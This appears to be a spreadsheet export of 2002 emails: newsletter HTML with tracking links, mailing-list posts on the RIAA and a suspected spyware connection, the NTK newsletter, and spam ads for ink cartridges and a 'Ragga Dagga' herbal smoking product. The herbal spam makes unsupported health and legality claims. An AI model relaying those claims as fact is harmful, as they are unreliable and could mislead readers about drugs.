 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5nBYvph1xmYgHobjqmZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4Dm2gxKNXLTSyPWc3uR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXoLN2lsxoLkkTKhn-yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2cAcqVs6fez6pa6cIJPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e432&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=74-VAw8nFZ9X0kNWyUXbD16nz1dp9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Want to Save yourself a trip to the store? 17579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</si>
  <si>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&lt;title&gt;Do you Have an Epson or Canon Printer?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &amp;nbsp;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"2" width=3D"460" height=3D"55" bordercolor=3D"#FFFF00" =
 bordercolorlight=3D"#FFFF00" bordercolordark=3D"#000080"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"49" align=3D"center" bgcolor=3D"#0066CC=
 "&gt;&amp;nbsp;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"11"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"5" align=3D"center" bgcolor=3D"=
 #FFFF99" style=3D"color: #FFFFFF; font-size: 10pt; font-weight: bold"&gt;&lt;b&gt;&lt;=
 font face=3D"Verdana" size=3D"3" color=3D"#0066CC"&gt;Do
         you Have an Inkjet or Laser Printer?&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;Yes? The=
 n we can &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;SAVE&lt;/=
 font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         you &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;$$$=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt; Money!&lt;/font&gt;&lt;=
 /b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;font face=3D"Verdana"&gt;Ou=
 r High Quality Ink &amp; Toner Cartridges come
         with a money-back guarantee,&lt;/font&gt; &lt;font face=3D"Verdana"&gt;a 1-yea=
 r
         Warranty*, and get &lt;/font&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "3" color=3D"#FFFF99"&gt;&lt;u&gt;FREE SHIPPING
         on ALL orders&lt;/u&gt;!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;and best=
  of all...They Cost
         &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt; 30-70%=
  &lt;/font&gt; &lt;i&gt;&lt;u&gt;&lt;font face=3D"Verdana" color=3D"#FFFF99" size=3D"4"&gt;Less&lt;/f=
 ont&gt;&lt;/u&gt;&lt;/i&gt;
         &lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         than
         Retail Price!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"11"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFF99" align=3D"center" styl=
 e=3D"color: #FFFFFF"&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#00CC99"&gt;&lt;a style=
 =3D"color: #000080" href=3D"http://www.payless4ink.com/"&gt;*Click here
         to visit Our Website!*&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;u&gt;&lt;font size=3D"4" color=3D"#FFFF99"&gt;or Call us Toll-Free @
         1-800-758-8084!&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Arial" color=3D"#C0C0C0"&gt;*90-day warra=
 nty on all remanufactured
         cartridges.&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
           &lt;table border=3D"0" width=3D"70%" height=3D"42"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"36" align=3D"center" style=3D"f=
 ont-family: Palatino Linotype; font-size: 8pt"&gt;&lt;font face=3D"Verdana" size=
 =3D"1" color=3D"#000000"&gt;You
                 are receiving this special offer because you have provided
                 permission to receive email communications regarding speci=
 al
                 online promotions or offers. If you feel you have received=
  this
                 message in error, or wish to be removed from our subscribe=
 r
                 list, &lt;a href=3D"mailto:print1@btamail.net.cn" style=3D"co=
 lor: #FF0000"&gt;Click HERE&lt;/a&gt;
                 and you will be removed within less than three business da=
 ys.
                 Thank You and sorry for any inconvenience.&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Phoenix Suns owner dons dreadlocks to help sell tickets
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8274142,1717/
 Date: 2002-09-26T12:27:20+01:00
 [IMG: http://www.newsisfree.com/Images/fark/sbb.gif ([Sports by Brooks])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: This little domain went to China....
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:
 &gt;The RIAA continues to amaze me.    Everyone might want to grok the
 &gt;news yahoo has:
 &gt;
 &gt;http://rd.yahoo.com/dailynews/nm/tc_nm/inlinks/*http://Listen4ever.com
 &gt;
 &gt;
 &gt;And if you're really bored, go ahead and read the papers that were
 &gt;filed by the RIAA against the major backbone providers.
 &gt;
 &gt;http://www.riaa.com/pdf/Listen4Ever.pdf
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;A very disgruntled,
 &gt;
 &gt;bitbitch
 &gt;
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;
 Well perhaps this little tidbit of sanity will make you (slightly) more 
 gruntled:
 http://www.informationwave.net/news/20020819riaa.php
 ----------------------------------------------------------
 *IWT Bans RIAA From Accessing Its Network*
 *August 19, 2002*
 Information Wave Technologies has announced it will actively deny the 
 Recording Industry Association of America (RIAA) from accessing the 
 contents of its network. Earlier this year, the RIAA announced its new 
 plan to access computers without owner's consent for the sake of 
 protecting its assets. Information Wave believes this policy puts its 
 customers at risk of unintentional damage, corporate espionage, and 
 invasion of privacy to say the least.
 Due to the nature of this matter and RIAA's previous history, we feel 
 the RIAA will abuse software vulnerabilities in a client's browser after 
 the browser accesses its site, potentially allowing the RIAA to access 
 and/or tamper with your data. Starting at midnight on August 19, 2002, 
 Information Wave customers will no longer be able to reach the RIAA's 
 web site. Information Wave will also actively seek out attempts by the 
 RIAA to thwart this policy and apply additional filters to protect our 
 customers' data.
 Information Wave will also deploy peer-to-peer clients on the Gnutella 
 network from its security research and development network (honeynet) 
 which will offer files with popular song titles derived from the 
 Billboard Top 100 maintained by VNU eMedia. No copyright violations will 
 take place, these files will merely have arbitrary sizes similar to the 
 length of a 3 to 4 minute MP3 audio file encoded at 128kbps. Clients 
 which connect to our peer-to-peer clients, and then afterwards attempt 
 to illegally access the network will be immediately blacklisted from 
 Information Wave's network. The data collected will be actively 
 maintained and distributed from our network operations site.
 The placement of this policy is not intended to hamper the RIAA's piracy 
 elimination agenda or advocate Internet piracy, but to ensure the safety 
 of our customers' data attached to our network from hackers or corporate 
 espionage hidden by the veil of RIAA copyright enforcement.
 If you have questions, comments, or concerns regarding this policy, 
 please e-mail riaa@informationwave.net &lt;mailto:riaa@informationwave.net&gt;.
 ----------------------------------------------------------------------------------
 Owen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-07-24
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Book Review: Web Development with Apache and Perl
     posted by pudge on Tuesday July 23, @00:26 (books)
     http://use.perl.org/article.pl?sid=02/07/23/0327228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</si>
  <si>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NTK now, 2002-08-23
</t>
  </si>
  <si>
    <t xml:space="preserve"> _   _ _____ _  __ &lt;*the* weekly high-tech sarcastic update for the uk&gt;
 | \ | |_   _| |/ / _ __   __2002-08-23_ o join! mail an empty message to
 |  \| | | | | ' / | '_ \ / _ \ \ /\ / / o ntknow-subscribe@lists.ntk.net
 | |\  | | | | . \ | | | | (_) \ v  v /  o website (+ archive) lives at:
 |_| \_| |_| |_|\_\|_| |_|\___/ \_/\_/   o     http://www.ntk.net/
          "Using a laptop computer in the shadow of Big Ben, we
          identified 26 parcels of confidential computer information."
                     - and inside each was a delicious chocolate treat
 www.sundaymirror.co.uk/homepage/news/page.cfm?objectid=12125585&amp;method=sm_full
                                 &gt;&gt; HARD NEWS &lt;&lt;
                               here falls shoe two
          Well, it's getting late, and the government hasn't fallen,
          so we better roll the presses on the bad news. The CAMPAIGN
          FOR DIGITAL RIGHTS published its first in-depth analysis of
          the EUCD. For this exciting installment, CD-R has
          concentrated on what it does to people who have to
          circumvent copy protection to do their job. The short
          summary is: if they're not a teacher, a prison warder,
          disabled, or the cops, they can forget their jobs. If you're
          anyone else - like a musician, or a cryptographer -  and the
          copy protection says you can't make a backup, you can't. And
          even if you *are* a teacher or other exceptional person,
          you'll have to ask the Secretary of State if you can crack
          the protected CD. In writing. Each time.
          http://uk.eurorights.org/issues/eucd/ukimpl/
                                      - oh, don't worry, it gets worse
          http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                    - what you can do to stop all this
          But there's plenty more to ooze out of the law than that.
          One of the big questions about the EUCD is "is it the
          European DMCA, or what?". Well, the DMCA spurted bad juice
          in many different directions, but one way in which the two
          are similiar is over "circumvention devices". Distributing
          DeCSS, the DVD lobby have claimed, is a crime under the
          DMCA. DeCSS is code that was also a magically dangerous
          artifact: a circumvention device. Circumvention devices are
          about to become illegal here. Specifically, three months in
          chokey (or two years if you really nark the judge), for
          those who "distribute otherwise than in the course of a
          business to such an extent as to affect prejudicially the
          copyright owner" one of them. "Otherwise in the course of
          business" is legalese for "as an ordinary punter", so it's
          not just mod-chip sellers who are liable. Anyone who
          distributes such satanic machines is also a perp.
          http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                    - what you can do to stop all this
          That's not going to go down well with ANDREW SIMMONS.
          Regular NTK readers will remember Andrew as a lightning rod
          to lawyers. Not only was he John Doe #13 in the American
          DeCSS case, but in a completely unrelated affair, he waws
          threatened with all manner of nastiness just for publishing
          his list of doomed dotcoms on his Website [NTK 2000-09-22].
          In the last week, he's had another letter via Demon, finally
          ordering him to remove his shiny "circumvention device" (aka
          DeCSS) from his site. It sounds like the lawyers may have
          shot their wad a tad early: the EUCD rules don't kick in
          until Christmas. But when the new laws do hit, and if what
          Andrew's preposterous correspondent says is believed in a UK
          court, hosting DeCSS *will* mean jail. There's been some
          talk about how the EUCD rules are better than the DMCA,
          because they specifically exclude computer programs from the
          new rules. Well, it looks like DeCSS is no longer just a
          computer program. From now on, it could become a special "nick me"
          tag for your Website.
          http://www.xenoclast.org/free-sklyarov-uk/2002-August/002923.html
                                                    - here we go again
          http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                            - CLICK ON THE DAMN LINK
                                 &gt;&gt; ANTI-NEWS &lt;&lt;
                              berating the obvious
          surely approaching the end of the PUERILE GOOGLE MISSPELLINGS
          soon: http://www.google.com/search?&amp;q=%22penny+farting%22 vs
          http://groups.google.com/groups?q=%22whitewater+farting%22 -
          we suspect some people are using "poofreading" deliberately,
          but probably not "potable document format", or the enigmatic:
          http://www.google.com/search?q=%22To+Be+Set+Browser+Caption%22
          ... presumably meant "interfaith" (unless of course they're
          Mac loyalists): http://www.ntk.net/2002/08/23/dohfaith.gif ...
          banner ads haven't been getting any less inappropriate either:
          http://www.ntk.net/2002/08/23/dohcruz.gif ... A Keyboard,
          Yesterday: http://news.bbc.co.uk/1/hi/technology/2208216.stm
          ..."A levles" in "Phisics, Information Technoligies, Languges":
   www.elance.com/c/fp/main/viewprofile.pl?view_person=insspirito&amp;catid=10231
          ... "Alcohol makes others better-looking" - scientists' shock
          finding: http://www.msnbc.com/news/796225.asp ... not judging
          them or anything: http://www.ntk.net/2002/08/23/dohsin.gif ...
          experience required in handling the *really* big accounts:
          http://www.ntk.net/2002/08/23/dohgod.gif ...
                                &gt;&gt; EVENT QUEUE &lt;&lt;
                          goto's considered non-harmful
          Is it just us, but just 5 years after Lara Croft appeared on
          the cover of "The Face", could it be that the PlayStation is
          now even cooler than ever? As if anyone had any doubts, next
          week's PLAYSTATION EXPERIENCE (from Thu 2002-08-29, Earl's
          Court, London) features exclusive demos of imminent releases,
          teen band "Blazing Squad", skateboarding, BMXing, plus DJ sets
          from the likes of XFM bootleggers James Hyman and Eddie
          Temple-Morris. And, best of all, Sony are charging you a mere
          UKP8 (plus booking fee) for the privilege of allowing them to
          market all their upcoming titles to you.
          http://www.ects.co.uk/pressmore.html?type=1&amp;articleID=43
            - still, Gareth "Gaz Top" Jones is hosting the ECTS awards
          http://www.caextreme.org/
                    - coin-op collectors hit San Jose in 2 weeks' time
          http://www.cobd.co.uk/yakfestpage.htm
                        - Llamasoft all-dayer in Oxford pub end of Sep
          http://www.frightfest.co.uk/programme2002.html
               - this weekend: horror film fest in London, with "Lupo"
                                 &gt;&gt; TRACKING &lt;&lt;
                sufficiently advanced technology : the gathering
          The crazy counterintuitive conditional probability world of
          BAYES THEOREM has a reputation for making judges look stupid
          in DNA-testing murder cases, and search-engines look even
          stupider when they suggest "relevant documents" - but it's
          getting a bit of a re-renaissance in the spam filtering
          world. Tradition states Naive Bayesian alone doesn't work
          well enough at filtering by example, so it's good to see
          dozens of people independently sloshing around the noospere
          looking for better tweaked solutions. Including, of course,
          leading noosphere cadet ERIC S RAYMOND, whose Bayesian
          BOGOFILTER is fast, has extra smarts, and is up to version
          0.2. Unfortunately, as with Raymond's abandoned kernel
          configurator and recent anti-gay anti-islam anti-vegetable
          rants, it requires taking on board just a *bit* too
          much extra baggage to really take off. Rennies' IFILE around
          has been around for a while, and has support for MH and
          mutt. Gary Arnold's BAYESPAM is something he knocked up in
          Perl for qmail; a good start if you want to try this
          yourself. Which you should, because nobody's cracked it yet.
          http://www.paulgraham.com/spam.html
                    - what i did after i invented another new language
 http://www.sjdm.org/mail-archive/jdm-society/2000-November/002244.html
 - so, given a probability of 1% that a judge has understood Bayes before
          http://tuxedo.org/~esr/bogofilter/bogofilter.html
      - of course some say the bogofilter should be on ESR's outgoing mail
          http://www.ai.mit.edu/~jrennie/ifile/
                                                  - leading by example
          http://www.garyarnold.com/projects.php#bayespam
                                 - "Don't hurt me, I'm a C programmer!"
                                 &gt;&gt; MEMEPOOL &lt;&lt;
                 ceci n'est pas une http://www.gagpipe.com/
          worth it for the elaborate assembly instructions/ blank page
          excuses alone: http://www.log.dial.pipex.com/things/ ...
      http://news.yahoo.com/news?tmpl=story2&amp;u=/nm/20020822/ts_nm/bush_dc_14
          vs http://www.theonion.com/onion3724/bush_vows_to_remove.html
          ... be a bit funnier if it read them out in her voice as
          well: http://homepage.ntlworld.com/l_tabraham/jbrr.htm ...
          hey, in future, why not try sending us these while they're
          still vaguely topical?: http://www.chthonic.f9.co.uk/24/ vs
          http://thesurrealist.co.uk/24/ ... When Audiophiles Attack #5
          (or #6?) - THE QUANTUM PURIFIER: http://www.bybeetech.com/ vs
      http://www.showandtellmusic.com/pages/galleries/gallery_q/morse.html
          ... when oh when will the bloggers tire of putting a new word
          in front of "chalking"?: http://zapatopi.net/psychalking.html
          ... just one small step closer to "Star Trek" warp drives:
          http://physicsweb.org/article/news/6/8/11/ ... doing well for
          "teaser openings": http://humanity.berlios.de/usr-bin-perl/
          ... CRONENBERG to direct (one of two) upcoming JUDGE DREDD
          movies?... bloody students: http://www.elve.net/rtips0b.htm ...
                                 &gt;&gt; GEEK MEDIA &lt;&lt;
                                   get out less
          TV&gt;&gt; the week's late-night sci-fi selection starts off with
          Yul Brunner 1970s post-apocalyptic beat-em-up THE ULTIMATE
          WARRIOR (12.40am, Fri, C5), John "The Last Seduction" Dahl's
          bonkers brainscanner UNFORGETTABLE (2.05am, Fri, C4), and the
          seems-to-last-an-eternity STARGATE (11.05pm, Sat, BBC1)... the
          BBC have swiftly replaced the advertised showing of serial
          killer psycho-profiler "Messiah 2" with repeats of THE LOST
          WORLD (9.15pm, Sat, BBC1)... and, considering what came after,
          AMERICAN PIE (9.05pm, Sat, C4) may be eventually regarded as
          one of the great teen movies of all time... it's a double-
          Arnie fertility-horror double-bill in TWINS (6.20pm, Sun,
          BBC1) and JUNIOR (4.50pm, Mon, BBC1)... Nell McAndrew and
          Rhona Cameron contribute to a slightly vague interpretation of
          "celebrity" in I'M A CELEBRITY - GET ME OUT OF HERE! (8pm,
          Sun, ITV)... WHEN [DIANA] DIED - DEATH OF A PRINCESS (9pm,
          Sun, C4) contains "scenes of nudity and religious ritual" -
          funny what people find offensive nowadays ... and Jeff "Tron"
          Bridges plays the other half of that K-Pax double-act in
          STARMAN (2.30pm, Mon, C5) - all together now: "You don't
          understand, Mrs Hayden: that *thing* is no longer your
          husband!"... archaeology imitates "Coneheads" in ANCIENT
          MURDER MYSTERY: RIDDLE OF THE CONE-SHAPED SKULLS (8pm, Mon,
          C5)... odd scheduling for Bill Murray's kid-friendly identity
          mixup THE MAN WHO KNEW TOO LITTLE (11.05pm, Tue, BBC1)... and
          if only they'd got hold of Tim Burton's recent "reimagining"
          to show after the run of BATTLE FOR/ FAREWELL TO/ BACK TO
          THE PLANET OF THE APES (1.30pm, Tue-Thu, ITV), you could have
          watched the franchise deteriorate before your very eyes...
          FILM&gt;&gt; good to see Time Magazine's staff staying cool long
          enough to publish their final "Humanity Doomed" collectors'
          edition for the backstory of "X-Files" director Rob Bowman's
          "2000AD"-style Brit-set monster apocalypse REIGN OF FIRE
          ( http://www.capalert.com/capreports/reignoffire.htm : "Here's
          to evolution!"; many deaths by incineration; child permitted
          in hardhat construction area; massive tattoos)... it's Martin
          "Bad Boys" Lawrence and Academy Award nominee Tom "In The
          Bedroom" Wilkinson - together at last! - in funnier-than-
          you'd-expect "Galaxy Quest"/"A Knight's Tale" hybrid BLACK
          KNIGHT ( http://www.screenit.com/movies/2001/black_knight.html :
          [Lawrence] does all sorts of mugging and facial contortions at
          the camera that some kids might want to imitate; we hear the
          King fart at dinner; some kids might want to imitate all of
          the action-based fighting that occurs)... or there's badfilm
          stalwart Heather Graham and "My Cousin Vinny" Academy Award
          winner Marisa "In The Bedroom" Tomei in clumsy Bollywood porn
          comedy pastiche THE GURU ( http://www.bbfc.co.uk/ : Contains
          strong sex references and language)...
          DRESS DOWN FRIDAY&gt;&gt; after an unexpected 3-month hiatus -
          because, hey, who buys t-shirts in the summer? - NTK's online
          store is back to full strength at http://www.geekstyle.co.uk/
          and now features lengthy explanations of exactly what PayPal
          will attempt to charge you. Also new this month: lots of
          designs now available in XXL, including the ever-popular 404
          /SHIRT/TIE NOT FOUND, a glow-in-the-dark variant of the ZX
          font BORN TO RUN one, plus slightly more limited numbers of
          the arcade-style HI-SCORE TABLE and the last few remaining
          souvenirs from June's EXTREME COMPUTING show. Oh and copies of
          Mark Bennett's BLACK ICE magazine (for just US$7 plus postage
          and packing) - Brighton's very own answer to "Mondo 2000"...
          meanwhile, your entries have continued to flood in, a leading
          contender being CHRIS HOWE's possibly Designers-Republic-
          influenced http://www.geekstyle.co.uk/images/chrismessiah.gif
          - though his email address appears to have changed recently,
          so if anyone knows where he is, could you ask him to get in
          touch? We also enjoyed JAMES SWIFT's politically motivated
          http://www.3dengineer.com/tshirts/privacylogged.gif , BRUCE's
          heartfelt http://www.growf.org/shirts/crack.gif , and ASHLEY
          POMEROY's whimsical http://www.ashleypomeroy.com/arpshirts.gif
          - but remained puzzled by people sending us what appear to be
          parodies of our existing parody designs, from OWAIN KENWAY's
          http://www.angelfire.com/scifi2/dsky/1337spotting.html through
          to JOF's http://www.overhope.org.uk/misc/revolution.jpg and
          PAUL "THE FRIDAY THING" CARR's perhaps over-self-explanatory:
          http://www.geekstyle.co.uk/images/tft-shirt.jpg . And if your
          design skills aren't up to this high standard, you can of
          course just mail us a text slogan, so long as it's at least as
          funny as SIMON LIPSON's "NTK: ROTFL meets ROT-13", ANDREW
          SIMMONS' "NTK: Notes you don't want to save, and for link
          evaluation", or PHIL SOUTH's "Frieze - Marther - Farquhar" -
          but designed to look like it's the name of a law company!...
          meanwhile, the http://www.geekstyle.co.uk/images/ gallery
          reveals the "Buy One, Subvert The Mass Media, Get One Free"
          contest to be hotting up once again, as 25-year-old web
          designer GRAEME DAVISON "just happened" to be wearing the
          shirt that spells "fuck" in ASCII URL-encoding when he was
          photographed by THE NORTHERN ECHO about his trip to see
          "Attack Of The Clones" open in LA. Even though this was only a
          local newspaper, the judging panel felt he deserved the full
          prize (of another t-shirt), as the story goes on to cover the
          ostensibly pointless nature of the entire exercise. That's the
          kind of product placement that money just can't buy...
                                &gt;&gt; SMALL PRINT &lt;&lt;
        Need to Know is a useful and interesting UK digest of things that
          happened last week or might happen next week. You can read it
        on Friday afternoon or print it out then take it home if you have
      nothing better to do. It is compiled by NTK from stuff they get sent.
                        Registered at the Post Office as
                               "geeks", apparently
                               http://anews.co.uk/
                                  NEED TO KNOW
             THEY STOLE OUR REVOLUTION. NOW WE'RE STEALING IT BACK.
                          Archive - http://www.ntk.net/
               Unsubscribe? Mail ntknow-unsubscribe@lists.ntk.net
                 Subscribe? Mail ntknow-subscribe@lists.ntk.net
  NTK now is supported by UNFORTU.NET, and by you: http://www.geekstyle.co.uk/
                           (K) 2002 Special Projects.
              Copying is fine, but include URL: http://www.ntk.net/
                     Tips, news and gossip to tips@spesh.com
              All communication is for publication, unless you beg.
               Press releases from naive PR people to pr@spesh.com
      Remember: Your work email may be monitored if sending sensitive material.
        Sending &gt;500KB attachments is forbidden by the Geneva Convention.
               Your country may be at risk if you fail to comply.
</t>
  </si>
  <si>
    <t xml:space="preserve">It may be worth removing all your apps from the approved list. (a bit of a 
 pain, I agree) then check the first app which makes the connection. With a 
 bit of luck it won't be anything standard
 At 21:47 03/08/02 +0100, you wrote:
 &gt;Unfortunately, I don't. ZoneAlarm normally gives that info but not this
 &gt;time. It just blocks the outward access and warns me that the attempt
 &gt;occurred.
 &gt;Brian
 &gt;----- Original Message -----
 &gt;From: "Martin Whelan" &lt;mwhelan@deisedesign.com&gt;
 &gt;To: &lt;iiu@taint.org&gt;
 &gt;Sent: Saturday, August 03, 2002 9:32 PM
 &gt;Subject: Re: [IIU] spyware calling home?
 &gt;
 &gt;
 &gt; &gt; Do you know which app is making the connection?
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; At 20:18 03/08/02 +0100, you wrote:
 &gt; &gt; &gt;Hello all
 &gt; &gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
 &gt;trying
 &gt; &gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the stage
 &gt;where
 &gt; &gt; &gt;normal web-browsing is almost impossible.
 &gt; &gt; &gt;I have checked IP address on RIPE database and I know precisely who is
 &gt;being
 &gt; &gt; &gt;called. I contacted that company on 14 July, when the problem first arose
 &gt; &gt; &gt;and asked for a remedy but (surprise) got no reply.
 &gt; &gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
 &gt; &gt; &gt;ran this and haven't had a problem again until today.
 &gt; &gt; &gt;The offending program is obviously not in Adaware db. (I run adaware with
 &gt; &gt; &gt;current ref files every day now).?
 &gt; &gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing this
 &gt; &gt; &gt;from my pc?
 &gt; &gt; &gt;Brian
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;_______________________________________________
 &gt; &gt; &gt;IIU mailing list
 &gt; &gt; &gt;IIU@iiu.taint.org
 &gt; &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
 &gt; &gt;
 &gt; &gt; ========================================================================
 &gt; &gt; Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 &gt; &gt;
 &gt; &gt; " Our core product Diseditor  allows organisations to publish
 &gt;information
 &gt; &gt; to their web site in a fast and cost effective manner. There is no need
 &gt;for
 &gt; &gt; a full time web developer, as the site can be easily updated by the
 &gt; &gt; organisations own staff.
 &gt; &gt; Instant updates to keep site information fresh. Sites which are updated
 &gt; &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html for
 &gt;a
 &gt; &gt; demonstration "
 &gt; &gt;
 &gt; &gt; Diseditor  " Managing Your Information "
 &gt; &gt; ========================================================================
 &gt; &gt;
 &gt; &gt; _______________________________________________
 &gt; &gt; IIU mailing list
 &gt; &gt; IIU@iiu.taint.org
 &gt; &gt; http://iiu.taint.org/mailman/listinfo/iiu
 &gt; &gt;
 &gt;
 &gt;_______________________________________________
 &gt;IIU mailing list
 &gt;IIU@iiu.taint.org
 &gt;http://iiu.taint.org/mailman/listinfo/iiu
 ========================================================================
 Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 " Our core product Diseditor  allows organisations to publish information 
 to their web site in a fast and cost effective manner. There is no need for 
 a full time web developer, as the site can be easily updated by the 
 organisations own staff.
 Instant updates to keep site information fresh. Sites which are updated 
 regularly bring users back. Visit www.deisedesign.com/deiseditor.html for a 
 demonstration "
 Diseditor  " Managing Your Information "
 ========================================================================
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let's Go Get Stoned
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff 1 &amp; 2 Personal-Choice, pipe-smoking products/substances to the common market!!!  
 We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment.the Seventh Heaven Temple 3 Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Product. Introduced after three years of research and development; Temple 3 is Personal Choice legal Smoking/Indulgence.Redefined!!!  
 Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer.in more cultivated/enhanced/viripotent/substantiated format.what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Seventh Heaven Temple 3 Ragga Dagga (TM) is the sweet, sweet evolution of all of that. 
 * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE 1 &amp; 2).
 * HAPPIER, HAPPY SMOKING!!!
 * INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.
 * MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.
 * NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!
 * INHIBITS STRESS AND ANXIETY.
 * INSPIRES CONTEMPLATIVENESS &amp; CREATIVITY.
 * ENHANCES THE SEXUAL EXPERIENCE!!!
 * GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMING.
 * A SIGNIFICANT HERBA / BOTANICAL SUPPLEMENT IN THE BATTLES AGAINST DRUG AND ALCOHOL DEPENDENCE!!!!
 * EASILY IGNITED &amp; STOKED.
 * SMOKES SWEETLY! 
 * ABSOLUTELY LEGAL / NON-INVASIVE / NO DOWNSIDE!!!
 * LINGERS FOR A GOOD, GOODLY WHILE!
 * POSSESSES MANY FINE GANJA VIRTUES WITH NONE OF THE NEGATIVES!!!
 * JUST A LITTLE SNIPPET / PINCH GOES A LONG, LONG WAY.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).
